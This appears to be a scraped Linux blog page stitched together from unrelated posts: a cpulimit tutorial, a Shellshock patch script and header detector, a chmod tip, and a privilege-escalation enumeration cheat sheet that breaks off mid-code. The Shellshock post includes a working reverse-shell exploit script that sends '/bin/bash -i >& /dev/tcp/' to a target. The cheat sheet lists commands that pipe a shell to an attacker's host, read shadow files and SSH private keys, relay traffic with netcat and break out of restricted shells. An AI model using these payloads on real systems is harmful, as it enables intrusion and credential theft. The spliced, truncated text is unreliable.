Posts tagged with "linux"

Version 1.0

Author: Srijan Kishore
Last edited 25/Aug/2014

This document describes how to limit CPU usage in Ubuntu 14.04. I will use the cpulimit utility for this purpose. Cpulimit is a tool which limits the CPU usage of a process (expressed as a percentage, not as CPU time). It is useful for controlling batch jobs when you don't want them to eat too many CPU cycles. The goal of cpulimit is to prevent a process from running for more than a specified time ratio. It does not change the nice value or other scheduling priority settings, but the real CPU usage. It is also able to adapt itself to the overall system load, dynamically and quickly. The CPU usage is controlled by sending SIGSTOP and SIGCONT POSIX signals to the process. All child processes and threads of the specified process share the same percentage of CPU.
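The SIGSTOP/SIGCONT mechanism described above, as an added example written for this page (not cpulimit's own code): it samples a process's CPU time from /proc/<pid>/stat, alternates SIGCONT and SIGSTOP in short duty cycles, and adjusts the running share with a feedback step. It assumes Linux; the busy child it spawns is a constructed stand-in for the tutorial's dd loop.

```python
"""Minimal cpulimit-style CPU limiter: sample CPU ticks from /proc/<pid>/stat
and alternate SIGCONT/SIGSTOP to hold usage near a target percentage.
Added example, not cpulimit's own code; Linux only."""
import os
import signal
import subprocess
import sys
import time

try:
    CLK_TCK = os.sysconf("SC_CLK_TCK")   # clock ticks per second used by /proc
except (AttributeError, ValueError, OSError):
    CLK_TCK = 100


def parse_proc_stat(line):
    """Return (utime, stime) in clock ticks from one /proc/<pid>/stat line.
    The comm field sits in parentheses and may itself contain spaces or ')',
    so split after the LAST ')' instead of on whitespace alone."""
    rest = line[line.rindex(")") + 1:].split()
    # rest[0] is the state; utime and stime are fields 14 and 15 of the file,
    # which puts them at rest[11] and rest[12].
    return int(rest[11]), int(rest[12])


def cpu_ticks(pid):
    with open("/proc/%d/stat" % pid) as f:
        utime, stime = parse_proc_stat(f.read())
    return utime + stime


def usage_fraction(ticks_before, ticks_after, elapsed_s, clk_tck=CLK_TCK):
    """CPU ticks consumed over an interval divided by the ticks available."""
    if elapsed_s <= 0:
        return 0.0
    return (ticks_after - ticks_before) / (clk_tck * elapsed_s)


def next_work_ratio(work_ratio, measured, target):
    """Feedback step: scale the share of each period the process may run by
    target/measured, clamped to (0, 1].  With nothing measured (the process
    was stopped the whole interval) fall back to the target itself."""
    if measured <= 0:
        return min(1.0, target)
    return min(1.0, max(0.01, work_ratio * target / measured))


def limit_process(pid, limit_percent, duration_s, period_s=0.1):
    """Hold pid near limit_percent for duration_s seconds and return the
    average usage fraction measured over the run.  Only this pid is
    controlled; cpulimit itself also covers the children of the process."""
    target = limit_percent / 100.0
    work_ratio = target
    start_t, start_ticks = time.monotonic(), cpu_ticks(pid)
    prev_t, prev_ticks = start_t, start_ticks
    try:
        while time.monotonic() - start_t < duration_s:
            run_for = period_s * work_ratio
            os.kill(pid, signal.SIGCONT)
            time.sleep(run_for)
            if work_ratio < 1.0:
                os.kill(pid, signal.SIGSTOP)      # shows as state T in top
                time.sleep(period_s - run_for)
            now_t, now_ticks = time.monotonic(), cpu_ticks(pid)
            measured = usage_fraction(prev_ticks, now_ticks, now_t - prev_t)
            work_ratio = next_work_ratio(work_ratio, measured, target)
            prev_t, prev_ticks = now_t, now_ticks
    finally:
        os.kill(pid, signal.SIGCONT)              # never leave the target stopped
    return usage_fraction(start_ticks, cpu_ticks(pid), time.monotonic() - start_t)


if __name__ == "__main__":
    # Constructed busy loop standing in for the tutorial's dd if=/dev/zero of=/dev/null.
    pct = int(sys.argv[1]) if len(sys.argv) > 1 else 30
    child = subprocess.Popen([sys.executable, "-c", "while True: pass"])
    try:
        avg = limit_process(child.pid, pct, duration_s=3.0)
        print("limit %d%%, measured %.1f%%" % (pct, 100 * avg))
    finally:
        child.kill()
```

Because the sampling period is coarse, the measured figure lands near the limit rather than exactly on it, which is the same effect as the 33.8% top reading for a 30% limit below.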

1 Preliminary Note

This tutorial is based on Ubuntu 14.04 server, so you should set up a basic Ubuntu 14.04 server installation before you continue with this tutorial. The system should have a static IP address. I use 192.168.0.100 as my IP address in this tutorial and server1.example.com as the hostname.

2 Installation

Firstly we need to install cpulimit as follows:

apt-get update
apt-get install cpulimit

3 Limiting CPU usage

Now we will check the utility for limiting the CPU usage. For this we will first check the CPU usage without cpulimit, then apply cpulimit and compare. Let's make this clear with an example.

  1. Here is an example of how to utilize your CPU with an application on a single-core CPU:

dd if=/dev/zero of=/dev/null &

root@server1:~# dd if=/dev/zero of=/dev/null &
[1] 1850
root@server1:~#

Then we will check the CPU usage with command:

top

top – 11:24:18 up 49 min,  1 user,  load average: 0.94, 1.02, 1.79
Tasks: 249 total,   2 running, 247 sleeping,   0 stopped,   0 zombie
%Cpu(s): 13.4 us, 11.6 sy,  0.0 ni, 74.9 id,  0.0 wa,  0.1 hi,  0.0 si,  0.0 st
KiB Mem:   1010540 total,   271652 used,   738888 free,    21760 buffers
KiB Swap:  1048572 total,        0 used,  1048572 free.   158204 cached Mem

PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
1850 root      20   0    7224    616    520 R 100.0  0.1   1:20.33 dd
1851 root      20   0   24952   1756   1180 R   0.3  0.2   0:00.03 top
1 root      20   0   33480   2776   1456 S   0.0  0.3   0:05.31 init
2 root      20   0       0      0      0 S   0.0  0.0   0:00.01 kthreadd

As we can see, the CPU usage has gone to 100%. Now we will use cpulimit to limit it. First we bring the process back to the foreground with fg and cancel it with CTRL+C:

fg

root@server1:~# fg
dd if=/dev/zero of=/dev/null
^C222182151+0 records in
222182150+0 records out
113757260800 bytes (114 GB) copied, 259.084 s, 439 MB/s

root@server1:~#

Now we can test cpulimit to see if it actually does what it is supposed to. Let's test it as follows:

cpulimit -l 30 dd if=/dev/zero of=/dev/null &

root@server1:~# cpulimit -l 30 dd if=/dev/zero of=/dev/null &
[1] 1852
root@server1:~# Process 1853 detected

[1]+  Done                    cpulimit -l 30 dd if=/dev/zero of=/dev/null
root@server1:~#

Now we will check the CPU usage with top command:

top

top – 11:30:54 up 55 min,  1 user,  load average: 0.20, 0.58, 1.34
Tasks: 250 total,   2 running, 247 sleeping,   1 stopped,   0 zombie
%Cpu(s):  4.5 us,  4.1 sy,  0.0 ni, 91.4 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
KiB Mem:   1010540 total,   271944 used,   738596 free,    21816 buffers
KiB Swap:  1048572 total,        0 used,  1048572 free.   158212 cached Mem

PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
1853 root      20   0    7224    612    520 T  33.8  0.1   0:35.53 dd
1 root      20   0   33480   2776   1456 S   0.0  0.3   0:05.37 init
2 root      20   0       0      0      0 S   0.0  0.0   0:00.01 kthreadd
3 root      20   0       0      0      0 S   0.0  0.0   0:00.02 ksoftirqd/0
4 root      20   0       0      0      0 S   0.0  0.0   0:00.00 kworker/0:0

Now you can see that the CPU usage has dropped from 100% to 33.8%, close to the 30% limit. So we have successfully verified that cpulimit can limit CPU consumption on a single-core Ubuntu system.

  2. Here is an example of how to utilize your CPU with an application on a multi-core CPU:

To check your CPU core count, use the command:

nproc

In my case the core count was 4.
Now we will check the CPU usage without cpulimit on all 4 cores, for an application, as follows:

for j in `seq 1 4`; do dd if=/dev/zero of=/dev/null & done

It will run the command on all the cores and yield the output:

root@server1:~# for j in `seq 1 4`; do dd if=/dev/zero of=/dev/null & done
[1] 1263
[2] 1264
[3] 1265
[4] 1266
root@server1:~#

Now check the CPU usage with top command:

top

top – 11:47:45 up 4 min,  1 user,  load average: 3.63, 1.53, 0.57
Tasks: 290 total,   5 running, 285 sleeping,   0 stopped,   0 zombie
%Cpu0  : 48.3 us, 51.3 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.3 hi,  0.0 si,  0.0 st
%Cpu1  : 47.8 us, 52.2 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
%Cpu2  : 53.3 us, 46.4 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.3 hi,  0.0 si,  0.0 st
%Cpu3  : 52.0 us, 48.0 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
KiB Mem:   1010540 total,   209712 used,   800828 free,    20276 buffers
KiB Swap:  1048572 total,        0 used,  1048572 free.    93632 cached Mem

PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
1263 root      20   0    7224    612    520 R 100.0  0.1   2:21.40 dd
1264 root      20   0    7224    616    520 R 100.0  0.1   2:21.41 dd
1265 root      20   0    7224    612    520 R  99.0  0.1   2:21.03 dd
1266 root      20   0    7224    616    520 R  98.0  0.1   2:20.82 dd
1281 root      20   0  104416   3992   2920 S   1.0  0.4   0:00.03 sshd
1283 root      20   0  104416   3988   2920 S   1.0  0.4   0:00.03 sshd
1279 root      20   0  104556   4008   2924 S   0.7  0.4   0:00.08 sshd    

The dd command is consuming almost 100% CPU on all the cores. Next we will check the command with the cpulimit utility. For this, kill the previous dd processes as follows:

killall dd

root@server1:~# killall dd
[1]   Terminated              dd if=/dev/zero of=/dev/null
[3]-  Terminated              dd if=/dev/zero of=/dev/null
[2]-  Terminated              dd if=/dev/zero of=/dev/null
[4]+  Terminated              dd if=/dev/zero of=/dev/null
root@server1:~#

Now use cpulimit with the same command as follows:

for j in `seq 1 4`; do cpulimit -l 20 dd if=/dev/zero of=/dev/null & done

root@server1:~# for j in `seq 1 4`; do cpulimit -l 20 dd if=/dev/zero of=/dev/null & done
[1] 1429
[2] 1430
[3] 1431
[4] 1432
root@server1:~# Process 1434 detected
Process 1433 detected
Process 1437 detected
Process 1439 detected

[1]   Done                    cpulimit -l 20 dd if=/dev/zero of=/dev/null
[2]   Done                    cpulimit -l 20 dd if=/dev/zero of=/dev/null
[3]-  Done                    cpulimit -l 20 dd if=/dev/zero of=/dev/null
[4]+  Done                    cpulimit -l 20 dd if=/dev/zero of=/dev/null
root@server1:~#

Now check the CPU usage with the cpulimit utility:

top

top – 11:59:10 up 16 min,  2 users,  load average: 0.47, 0.71, 0.81
Tasks: 256 total,   2 running, 251 sleeping,   3 stopped,   0 zombie
%Cpu0  :  2.0 us,  2.0 sy,  0.0 ni, 96.0 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
%Cpu1  : 26.2 us, 22.8 sy,  0.0 ni, 50.7 id,  0.0 wa,  0.3 hi,  0.0 si,  0.0 st
%Cpu2  : 14.0 us, 12.3 sy,  0.0 ni, 73.8 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
%Cpu3  : 13.3 us, 11.6 sy,  0.0 ni, 75.1 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
KiB Mem:   1010540 total,   204064 used,   806476 free,    20408 buffers
KiB Swap:  1048572 total,        0 used,  1048572 free.    98340 cached Mem

PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
1433 root      20   0    7224    612    520 T  28.2  0.1   0:12.00 dd
1439 root      20   0    7224    616    520 R  26.6  0.1   0:12.13 dd
1434 root      20   0    7224    612    520 T  25.3  0.1   0:11.97 dd
1437 root      20   0    7224    612    516 T  22.9  0.1   0:11.93 dd
7 root      20   0       0      0      0 S   0.3  0.0   0:00.22 rcu_sched
8 root      20   0       0      0      0 S   0.3  0.0   0:00.21 rcuos/0      

As you can see above, the CPU usage has been limited from 100% to roughly 20% per process on a multi-core CPU.

Congratulations! We have successfully tested the cpulimit for limiting the CPU usage in Ubuntu 14.04 🙂

4 Links


The popular Linux and Unix shell has a serious security problem that means real trouble for many web servers. Fortunately, a patch — as source code — is available. Bash, aka the Bourne-Again Shell, has a newly discovered security hole. And, for many Unix or Linux Web servers, it’s a major problem.


The flaw involves how Bash evaluates environment variables. With specifically crafted variables, a hacker could use this hole to execute shell commands. This, in turn, could render a server vulnerable to ever greater assaults.

By itself, this is one of those security holes where an attacker would already need to have a high level of system access to cause damage. Unfortunately, as Red Hat's security team put it, "Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue."

The root of the problem is that Bash is frequently used as the system shell. Thus, if an application calls a Bash shell command via web HTTP or a Common Gateway Interface (CGI) in a way that allows a user to insert data, the web server could be hacked. As Andy Ellis, the Chief Security Officer of Akamai Technologies, wrote: "This vulnerability may affect many applications that evaluate user input, and call other applications via a shell."

That could be a lot of web applications — including many of yours.

The most dangerous circumstance is if your applications call scripts with super-user — aka root — permissions. If that’s the case, your attacker could get away with murder on your server.

You can try patching with this script:

#!/bin/sh
# Build bash 4.3 from source with the official patches applied, then run the
# published test string; a patched bash prints only "this is a test".
mkdir src
cd src
wget http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz
# the official patches are numbered from 001 upwards (there is no bash43-000)
for i in $(seq -f "%03g" 1 25); do wget http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-$i; done
tar zxvf bash-4.3.tar.gz
cd bash-4.3
for i in $(seq -f "%03g" 1 25); do patch -p0 < ../bash43-$i; done
./configure && make && make install
cd ..
cd ..
rm -r src
# make install puts the new binary in /usr/local/bin; make sure that is the bash found first in PATH
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
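A defender-side check for the behaviour described above, as an added example (not code from the original post): it looks for the `() {` function-definition prefix, which pre-patch bash imports from any environment variable, in the HTTP request headers a CGI server copies into the environment, and optionally runs the same local bash test the patch script ends with. The sample requests and header names are constructed.

```python
"""Detect Shellshock-style (CVE-2014-6271) payloads in HTTP request headers
and check the local bash.  Added example, not part of the original post."""
import re
import subprocess

# Before the fix, bash treated any environment variable whose value begins
# with the four characters "() {" as an exported function definition and kept
# executing whatever followed the closing brace.  A CGI web server copies
# request headers into the environment (HTTP_USER_AGENT, HTTP_COOKIE, ...),
# so that prefix is what to look for in request headers.
FUNC_DEF_PREFIX = re.compile(r"^\(\) \{")


def header_is_suspicious(value):
    """True if a header value would be parsed by old bash as a function."""
    return FUNC_DEF_PREFIX.match(value.strip()) is not None


def parse_raw_request(raw):
    """Split a raw HTTP/1.x request head into (method, path, headers dict)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path = lines[0].split(" ")[:2]
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip()] = value.strip()
    return method, path, headers


def find_function_defs(headers):
    """Sorted (header, value) pairs whose value starts like a bash function."""
    return sorted((n, v) for n, v in headers.items() if header_is_suspicious(v))


def local_bash_vulnerable(bash="bash"):
    """Run the same check the patch script ends with.  A patched bash prints
    only 'this is a test'; a vulnerable one also prints 'vulnerable'.
    Returns None if bash cannot be run."""
    env = {"x": "() { :;}; echo vulnerable", "PATH": "/usr/local/bin:/usr/bin:/bin"}
    try:
        proc = subprocess.run([bash, "-c", "echo this is a test"], env=env,
                              capture_output=True, text=True, timeout=5)
    except (OSError, subprocess.TimeoutExpired):
        return None
    return "vulnerable" in proc.stdout


# Constructed sample requests: the first carries the post's own test string in
# a header, the second is an ordinary browser request.
SAMPLE_REQUESTS = [
    "GET /cgi-bin/test.cgi HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: () { :;}; echo vulnerable\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n\r\n",
]


def scan_samples(raw_requests=SAMPLE_REQUESTS):
    """Map each request path to the suspicious headers found in it."""
    results = {}
    for raw in raw_requests:
        _, path, headers = parse_raw_request(raw)
        results[path] = find_function_defs(headers)
    return results


if __name__ == "__main__":
    for path, hits in scan_samples().items():
        print("%-20s %s" % (path, hits or "clean"))
    print("local bash vulnerable:", local_bash_vulnerable())
```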

So, how do we try the reverse shell? Here we go:

#
# CVE-2014-6271 cgi-bin reverse shell (Python 2 script)
#

import httplib,urllib,sys

if (len(sys.argv)<4):
	print "Usage: %s <host> <cgi-path> <attacker-ip/port>" % sys.argv[0]
	print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
	exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",
	"test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data


Doing chmod on Linux per file and per directory.

I don't know what is wrong with my server or my computer. Every time I compress the files, upload them via cPanel and extract them with cPanel's unzip, the files always end up with permission 600 and the directories with 700.

OMG, if I do # > chmod -R 755 . then of course all files, including directories, become executable.

Then how? I found my way; uncle Google helped me..

#> find . -type d -exec chmod 755 {} \;
#> find . -type f -exec chmod 644 {} \;

OK, that's simple, but also simple to forget 🙂 Just a little note on my website.


Before starting, I would like to point out – I'm no expert. As far as I know, there isn't a "magic" answer in this huge area. This is simply my findings, typed up, to be shared (my starting point). Below is a mixture of commands to do the same thing, to look at things in a different place or just in a different light. I know there are more "things" to look for. It's just a basic & rough guide. Not every command will work for each system as Linux varies so much. "It" will not jump off the screen – you have to hunt for that "little thing" as "the devil is in the detail".

Enumeration is the key.
(Linux) privilege escalation is all about:

  • Collect – Enumeration, more enumeration and some more enumeration.
  • Process – Sort through data, analyse and prioritisation.
  • Search – Know what to search for and where to find the exploit code.
  • Adapt – Customize the exploit, so it fits. Not every exploit works for every system "out of the box".
  • Try – Get ready for (lots of) trial and error.

Operating System
What’s the distribution type? What version?
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release

What’s the Kernel version? Is it 64-bit?
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-

What can be learnt from the environmental variables?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Is there a printer?
lpstat -a

Applications & Services
What services are running? Which service has which user privilege?
ps aux
ps -ef
top
cat /etc/service

Which service(s) are being run by root? Of these services, which are vulnerable – it's worth a double check!
ps aux | grep root
ps -ef | grep root

What applications are installed? What version are they? Are they currently running?
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archives/
ls -alh /var/cache/yum/

Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'

What jobs are scheduled?
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords?
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"   # Joomla

Communications & Networking
What NIC(s) does the system have? Is it connected to another network?
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network

What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname

What other users & hosts are communicating with the system?
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w

What's cached? IP and/or MAC addresses
arp -e
route
/sbin/route -nee

Is packet sniffing possible? What can be seen? Listen to live traffic
# tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21

Have you got a shell? Can you interact with the system?
http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/
nc -lvp 4444    # Attacker. Input (Commands)
nc -lvp 4445    # Attacker. Output (Results)
telnet [attackers ip] 44444 | /bin/sh | [local ip] 44445    # On the target system. Use the attacker's IP!

Is port forwarding possible? Redirect and interact with traffic from another view
rinetd
http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch

fpipe
# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7

# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080:127.0.0.1:80 root@192.168.1.7    # Local Port
ssh -R 8080:127.0.0.1:80 root@192.168.1.7    # Remote Port

# mknod backpipe p ; nc -l -p [remote port] < backpipe  | nc [local IP] [local port] >backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe    # Port Relay
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe    # Proxy (Port 80 to 8080)
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe    # Proxy monitor (Port 80 to 8080)

Is tunnelling possible? Send commands locally, remotely
ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig

Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
id
who
w
last
cat /etc/passwd | cut -d: -f1    # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users
cat /etc/sudoers
sudo -l

What sensitive files can be found? 
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/

Anything "interesting" in the home directories? If it's possible to access them
ls -ahlR /root/
ls -ahlR /home/

Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg

What has the user been doing? Is there any password in plain text? What have they been editing?
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history

What user information can be found? 
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root

Can private-key information be found? 
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key

File Systems
Which configuration files can be written in /etc/? Able to reconfigure a service?
ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null     # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null        # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null    # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null          # Other

find /etc/ -readable -type f 2>/dev/null                         # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null   # Anyone

What can be found in /var/ ? 
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases

Any settings/files (hidden) on website? Any settings file with database information?
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/

Is there anything in the log file(s) (Could help with “Local File Includes”!)
# http://www.thegeekstuff.com/2011/08/linux-var-log-files/
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/
# auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp

If commands are limited, can you break out of the "jail" shell?
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i

How are file-systems mounted? 
mount
df -h

Are there any unmounted file-systems?
cat /etc/fstab

What “Advanced Linux File Permissions” are used? Sticky bits, SUID & GUID
find / -perm -1000 -type d 2>/dev/null    # Sticky bit – Only the owner of the directory or the owner of a file can delete or rename here
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) – run as the  group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) – run as the  owner, not the user who started it.

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)

Find starting at root (/): SGID or SUID, not symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

Where can files be written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm
find / -writable -type d 2>/dev/null        # world-writeable folders
find / -perm -222 -type d 2>/dev/null      # world-writeable folders
find / -perm -o+w -type d 2>/dev/null    # world-writeable folders

find / -perm -o+x -type d 2>/dev/null    # world-executable folders

find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null   # world-writeable & executable folders

Any "problem" files? World-writeable, "nobody" files
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writeable files
find /dir -xdev \( -nouser -o -nogroup \) -print   # Noowner files

Preparation & Finding Exploit Code
What development tools/languages are installed/supported?
find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc

How can files be uploaded?
find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp

Finding exploit code
http://www.exploit-db.com
http://1337day.com
http://www.securiteam.com
http://www.securityfocus.com
http://www.exploitsearch.net
http://metasploit.com/modules/
http://securityreason.com
http://seclists.org/fulldisclosure/
http://www.google.com

Finding more information regarding the exploit 
http://www.cvedetails.com
http://packetstormsecurity.org/files/cve/[CVE]
http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]
http://www.vulnview.com/cve-details.php?cvename=[CVE]

(Quick) "common" exploits. Warning: pre-compiled binary files. Use at your own risk
http://tarantula.by.ru/localroot/
http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/

Mitigations
Is any of the above information easy to find? 
Try doing it!
Set up a cron job which automates script(s) and/or 3rd party products

Is the system fully patched? Kernel, operating system, all applications, their plugins and web services
apt-get update && apt-get upgrade
yum update

Are services running with the minimum level of privileges required? 
For example, do you need to run MySQL as root?

Scripts: can any of this be automated?
http://pentestmonkey.net/tools/unix-privesc-check/
http://labs.portcullis.co.uk/application/enum4linux/
http://bastille-linux.sourceforge.net
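The automated check the Mitigations section asks for, as an added example written for this page (not one of the scripts linked above): it inventories SUID/SGID regular files the way the find commands in the File Systems section do, stores a baseline with owner, mode and SHA-256, and on later (e.g. cron) runs reports anything added, removed or changed. The paths in the usage comment and test data are constructed.

```python
"""Set-ID file inventory with baseline comparison.  Added example, not one of
the scripts the post links to."""
import hashlib
import json
import os
import stat
import sys


def is_setid(mode):
    """True for a regular file carrying the SUID or SGID bit, the condition
    behind `find / -perm -g=s -o -perm -u=s -type f` above."""
    return stat.S_ISREG(mode) and bool(mode & (stat.S_ISUID | stat.S_ISGID))


def sha256_file(path):
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def _same_dev(path, dev):
    try:
        return os.lstat(path).st_dev == dev
    except OSError:
        return False


def inventory(root, one_fs=True):
    """Walk root without following symlinks and return
    {path: {"mode", "uid", "gid", "sha256"}} for every set-ID regular file.
    one_fs prunes other filesystems like `find -xdev`; unreadable files are
    kept with sha256 None so their presence is still recorded."""
    found = {}
    root_dev = os.lstat(root).st_dev
    for dirpath, dirnames, filenames in os.walk(root):
        if one_fs:
            dirnames[:] = [d for d in dirnames
                           if _same_dev(os.path.join(dirpath, d), root_dev)]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not is_setid(st.st_mode):
                continue
            try:
                digest = sha256_file(path)
            except OSError:
                digest = None
            found[path] = {"mode": "%o" % stat.S_IMODE(st.st_mode),
                           "uid": st.st_uid, "gid": st.st_gid, "sha256": digest}
    return found


def diff_baseline(baseline, current):
    """Set-ID files that appeared, vanished or changed mode/owner/content
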